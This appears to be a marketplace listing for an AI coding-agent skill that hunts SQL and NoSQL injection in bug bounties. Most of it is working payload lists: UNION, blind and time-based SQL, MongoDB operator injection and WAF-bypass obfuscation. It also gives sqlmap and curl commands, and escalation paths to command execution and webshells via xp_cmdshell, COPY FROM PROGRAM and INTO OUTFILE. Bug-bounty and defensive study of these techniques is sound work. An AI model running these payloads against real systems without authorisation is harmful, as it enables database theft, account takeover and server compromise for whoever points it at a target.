Stats
Actions
Tags
From claude-bughunter
Hunts SQL and NoSQL injection vulnerabilities using patterns from 12 bug bounty reports. Covers MongoDB $regex/$where, ORM raw-fragment SQLi, SOQL injection, blind SQLi in GraphQL, and OIDC-proxy backends.
How this skill is triggered — by the user, by Claude, or both
Slash command
/claude-bughunter:hunt-sqliThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
SQL injection remains one of the highest-paying vulnerability classes in bug bounty because it directly threatens data confidentiality, integrity, and availability at scale.
SQL injection remains one of the highest-paying vulnerability classes in bug bounty because it directly threatens data confidentiality, integrity, and availability at scale.
Highest-value targets:
/search)sctrack.email.uber.com.cn)Asset types that pay most:
/search, /filter, /sort, /report parameters.cn, .co, .io regional variants)URL patterns that suggest injectable parameters:
/search?q=
/filter?category=
/sort?by=&order=
/report?start_date=&end_date=
/api/v1/items?id=
/index.php?id=
/gallery?album_id=
/track?uid=&campaign=
?page=&limit=&offset=
Response header signals:
X-Powered-By: PHP — likely MySQL/PostgreSQL backendServer: Apache + PHP — classic LAMP stackX-Powered-By: Express — possible MongoDB/NoSQL backendJavaScript patterns indicating dynamic query construction:
// Look for these in JS bundles
fetch(`/api/search?q=${userInput}`)
$.ajax({ url: '/filter?sort=' + param })
axios.get('/report?from=' + startDate + '&to=' + endDate)
Tech stack signals:
/wp-content/plugins/)/admin/, /api/experimental/)/_graphql, /search, /api/v3/)$where, $regex in request bodies)Content-type signals for NoSQL:
Content-Type: application/json bodies with nested object parametersparam[]=value or {"key": {"$gt": ""}}Enumerate all input vectors — Use Burp Suite passive scan during normal app usage. Capture every parameter: GET, POST, JSON body, HTTP headers (User-Agent, Referer, X-Forwarded-For), cookies, path segments.
Identify the tech stack — Check response headers, error messages, job postings, Wappalyzer, BuiltWith. Determines which payloads to prioritize (MySQL vs PostgreSQL vs MongoDB).
Baseline the response — Note normal response length, status code, and response time for a clean request. This is your diff baseline.
Send error-based probes — Inject single quote ', double quote ", backtick `, and observe for:
Test boolean-based blind — Send true/false conditions and compare responses:
param=1 AND 1=1 vs param=1 AND 1=2Test time-based blind — When no visible difference exists:
param=1 AND SLEEP(5)param=1; SELECT pg_sleep(5)--param=1; WAITFOR DELAY '0:0:5'--For NoSQL (MongoDB) — Test object injection via JSON body and PHP-style array params:
{"$gt": ""} in JSONparam[$ne]=invalid in query stringsAutomate confirmation — Run sqlmap on confirmed candidates with --level=3 --risk=2 to enumerate databases without manual effort.
Escalate impact — Attempt:
UNION-based extraction (enumerate columns first)INFORMATION_SCHEMA dumpLOAD_FILE, INTO OUTFILE) if permissions allowxp_cmdshell)Document the full chain — Capture Burp repeater request/response, sqlmap output, and proof of data extraction (non-sensitive fields only for report).
Initial Error-Based Probes:
'
''
`
')
"))
' OR '1'='1
' OR 1=1--
" OR 1=1--
' OR 1=1#
admin'--
Boolean-Based Blind:
' AND 1=1-- (true condition)
' AND 1=2-- (false condition)
' AND SUBSTRING(version(),1,1)='5'--
1 AND (SELECT COUNT(*) FROM users) > 0--
Time-Based Blind:
-- MySQL
' AND SLEEP(5)--
1; SELECT SLEEP(5)--
-- PostgreSQL
'; SELECT pg_sleep(5)--
1 AND (SELECT 1 FROM pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
1; EXEC xp_cmdshell('ping -n 5 127.0.0.1')--
-- SQLite
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(300000000/2)))))==1--
UNION-Based (enumerate columns first):
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10-- (find column count via error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
NoSQL Injection (MongoDB):
// JSON body injection
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"$where": "this.username == this.password"}
// Query string injection
username[$ne]=invalid&password[$ne]=invalid
username[$regex]=.*&password[$regex]=.*
PHP Hash/Array Injection:
# Replace scalar with array
param[key]=value
param[$gt]=0
param[$ne]=null
Grep patterns for JS source hunting:
# Find unsanitized query construction in JS
grep -r "query\s*+=" src/
grep -r "WHERE.*\+" src/
grep -r "\.find({" src/ | grep -v "sanitize\|escape"
grep -rE "db\.query\(.*\+" src/
curl time-based detection:
# Baseline
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test"
# Inject
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test' AND SLEEP(5)--"
# SQLMap quick scan
sqlmap -u "https://target.com/search?q=test" --dbs --level=3 --risk=2 --batch
# SQLMap with POST
sqlmap -u "https://target.com/api/filter" --data="category=electronics&sort=price" --dbs --batch
# SQLMap with cookie auth
sqlmap -u "https://target.com/admin/report" --cookie="session=TOKEN" --dbs --batch --level=5
Burp Intruder payload list for column enumeration:
§1§
§1§,§1§
§1§,§1§,§1§
§1§,§1§,§1§,§1§
String concatenation instead of parameterized queries — The #1 root cause. Developers build SQL strings with user input directly: "SELECT * FROM items WHERE id=" + userId.
ORMs bypassed for "performance" — Developer switches from safe ORM to raw query for complex joins or reports: db.query("SELECT " + userColumn + " FROM table").
Search/filter functionality — Sorting and filtering logic is notoriously hard to parameterize (column names can't be bound), leading to allowlist bypasses or no protection at all.
Third-party plugin/library vulnerabilities — Developers trust installed plugins (WordPress, Joomla extensions) without auditing their query logic (Uber's Huge IT Video Gallery case).
Legacy codebases — Old PHP 4/5 code predating PDO/MySQLi prepared statements, still running in production on acquired assets or regional subdomains.
Internal tools promoted to external — Tools like Apache Airflow were designed for internal use with minimal security hardening, then exposed to authenticated external users.
NoSQL false sense of security — Developers believe "we use MongoDB so no SQL injection" and skip input validation entirely, enabling object/operator injection.
Insufficient escaping of ORDER BY / GROUP BY — These clauses cannot use bound parameters, so developers escape manually (and often incorrectly).
HTTP header and non-obvious inputs — User-Agent, Referer, X-Forwarded-For stored in DB without sanitization, assuming they're "trusted" server-side values.
WAF Bypass Techniques:
Keyword obfuscation:
-- Space substitution
SELECT/**/username/**/FROM/**/users
SEL/**/ECT username FROM users
%09SELECT%09username%09FROM%09users (tab)
SELECT%0Ausername%0AFROM%0Ausers (newline)
-- Case variation
SeLeCt UsErNaMe FrOm UsErS
sElEcT username fRoM users
-- Comment injection
SE/**/LECT username FR/**/OM users
/*!SELECT*/ username /*!FROM*/ users (MySQL version comments)
/*!50000SELECT*/ username FROM users
Encoding bypasses:
URL encode: %27 = ' %20 = space %23 = #
Double URL encode: %2527 = %27 = '
Unicode: ʼ (U+02BC) as quote substitute
HTML entity (in reflected contexts): '
Operator substitution:
-- Avoid "OR" and "AND"
' || '1'='1
' && '1'='1
UNION ALL SELECT (instead of UNION SELECT)
Function substitution:
-- When SLEEP is blocked
BENCHMARK(10000000,MD5(1))
GET_LOCK('a',5)
-- When UNION is blocked
INTO OUTFILE (different extraction method)
Header-based injection to avoid URL WAFs:
curl -H "X-Forwarded-For: 127.0.0.1' AND SLEEP(5)--" https://target.com/
curl -H "User-Agent: test' AND SLEEP(5)--" https://target.com/
curl -H "Referer: https://evil.com/' AND SLEEP(5)--" https://target.com/
JSON/NoSQL WAF bypass:
{"username": {"$\u0067t": ""}}
{"user\u006eame": {"$gt": ""}}
Authentication bypass for "authenticated-only" injection (Airflow pattern):
Chunked transfer encoding to bypass body inspection:
Transfer-Encoding: chunked
(split payload across chunks to evade WAF reassembly)
Before writing the report, answer all three:
1. What can the attacker DO right now? Must be able to demonstrate at least one of:
SLEEP(5), confirmed by timing)information_schema.tablesIf the only evidence is an error message change with no data extraction or timing proof, it may be informational only (like Report 1 — rated Low).
2. What does the victim LOSE? Must identify specific data at risk:
A generic "database could be read" without identifying what database/table contains sensitive data weakens the report significantly.
3. Can it be reproduced in 10 minutes from scratch? Must have:
If you need more than one account, special timing, or race conditions to reproduce — document all prerequisites explicitly before submitting.
Scenario A — Regional Subdomain, Legacy Stack (Uber sctrack pattern)
An email tracking subdomain (sctrack.email.[company].com.cn) built on a legacy PHP stack accepted a uid parameter for tracking email opens. The parameter was concatenated directly into a MySQL query. Using a time-based blind payload, an unauthenticated attacker could enumerate the entire database schema, extract email campaign recipient lists including PII, and potentially pivot to internal infrastructure. Regional subdomains are often managed by local teams with lower security maturity and outside the primary WAF perimeter — making them consistently high-yield targets.
Scenario B — Third-Party Plugin on Enterprise Domain (Uber WordPress plugin pattern)
A company's marketing site ran WordPress with the Huge IT Video Gallery plugin. The plugin's album_id parameter was unparameterized. Because the site shared database credentials with other services, exploitation could reach beyond the WordPress installation. This illustrates the plugin supply chain risk: the parent company's bug bounty scope included the domain, but the vulnerable code was entirely third-party. Hunting WordPress plugins means auditing installed plugins against known CVEs AND testing for novel injections in their parameters — the enterprise brand amplifies the payout even when the root cause is a $20 plugin.
Scenario C — Authenticated Internal Tool Exposed Externally (Airflow pattern)
Apache Airflow's web interface, deployed for workflow orchestration and accessible to authenticated users, contained SQL injection in a filter/search parameter within the admin UI. Because Airflow often runs with database superuser credentials (it needs to manage its own metadata DB), exploitation by any authenticated user — including low-privilege accounts — could lead to full database read/write access and potentially OS-level command execution via COPY TO/FROM or similar DB features. The lesson: "authenticated-only" does not mean "safe" — internal tools have weak authorization models and often over-privileged DB connections.
The following real, verified bug-bounty / CVE / coordinated-disclosure cases extend this skill with modern (2021-2024) examples emphasising NoSQL and ORM-bypass — the two SQLi families most under-represented in older bundles.
Rocket.Chat — Pre-auth blind NoSQL injection in getPasswordPolicy (CVE-2021-22911) (H1 #1130721 · Sonar writeup)
$regex operator) — pre-auth{"msg":"method","method":"getPasswordPolicy","params":[{"token":{"$regex":"^a"}}]} — brute-force password-reset token character-by-character via response-time/boolean side-channel, then chain to admin password reset → RCE via integrationsmethods accepted raw object selectors; getPasswordPolicy did not validate that token was a string before passing it to Mongo findOneMongoose ORM — $where injection via populate({match}) (CVE-2024-53900 + CVE-2025-23061) (GHSA-m7xq-9374-9rvx)
Model.find().populate({path:'author', match:{$where:"sleep(5000) || true"}}) — attacker-controlled JSON forwarded into populate({match}) reached MongoDB $where, executing arbitrary server-side JavaScript → blind exfil + DoS$where inside match filters; developers assumed ORM-level safetyDjango — QuerySet.values() JSONField SQL Injection (CVE-2024-42005) (H1 #2646493 · Commit)
Item.objects.values('data__"); DROP TABLE x;--') — a crafted JSON-path key (passed as *args from a request parameter) was used as a SQL column alias without escaping; .values() emitted SELECT (data->>'…') AS "…"; DROP TABLE x;--"Mozilla — Boolean-based blind SQLi on mozilla.social invite endpoint (H1 #2209130)
POST /invite {"code":"abc' AND (SELECT COUNT(*) FROM information_schema.tables)>0--"} — boolean differentiation between "invalid code" and "code accepted, redirect issued" allowed schema/table enumeration on the OIDC proxy Postgres backendhunt-rce — A SQLi against a DB user with FILE, xp_cmdshell, or COPY FROM PROGRAM privileges is an RCE primitive, not just a data-read. Chain primitive: MSSQL union-based SQLi → EXEC xp_cmdshell 'whoami' → RCE as NT AUTHORITY\SYSTEM; Postgres SQLi with pg_read_server_files or COPY ... FROM PROGRAM 'id' → RCE; MySQL SQLi with FILE → write webshell to web-root via INTO OUTFILE.hunt-idor — Once SQLi gives you arbitrary read on the users table, you have the IDs/UUIDs needed to enumerate IDOR endpoints at scale. Chain primitive: blind SQLi extracts users.uuid column → feed UUIDs into /api/users/{uuid}/profile → confirmed mass IDOR-with-PII rather than a theoretical broken-access-control.hunt-auth-bypass — Classic ' OR 1=1 -- in login forms or session tables is auth-bypass-via-SQLi. Chain primitive: SQLi on the password_reset_tokens table → read or insert a token row for [email protected] → ATO without ever seeing the original password.security-arsenal — Reach for the SQLi payload tree (WAF-bypass union variants /**/UnIoN/**/SeLeCt/**/, MSSQL WAITFOR DELAY '0:0:10', MySQL SLEEP(10), Postgres pg_sleep(10), Oracle DBMS_PIPE.RECEIVE_MESSAGE, NoSQLi {"$ne": null} / {"$where": "sleep(5000)"}, second-order via stored-then-rendered fields).triage-validation — Apply the Reproducibility Gate before reporting. A 200ms delta on a sleep-10 payload is noise, not blind SQLi. Require statistical evidence (5 trials at 0s vs 5 trials at 10s, non-overlapping confidence intervals) or an OOB DNS callback with a unique marker. The hunt-sqli internal sentinel/baseline pattern exists for exactly this.npx claudepluginhub elementalsouls/claude-bughunterGuides SQL injection penetration testing in web apps with payloads for union-based, blind, error-based, time-based attacks, ORM injections in Django/Rails/SQLAlchemy, bypasses, and checklists.
Executes SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization.
SQL injection testing methodology covering error-based, union, blind, NoSQL, GraphQL, WebSocket, and JSON-operator attacks. Includes WAF bypass, DB-specific exploitation, ORM CVE tracking, and automation with sqlmap/ghauri.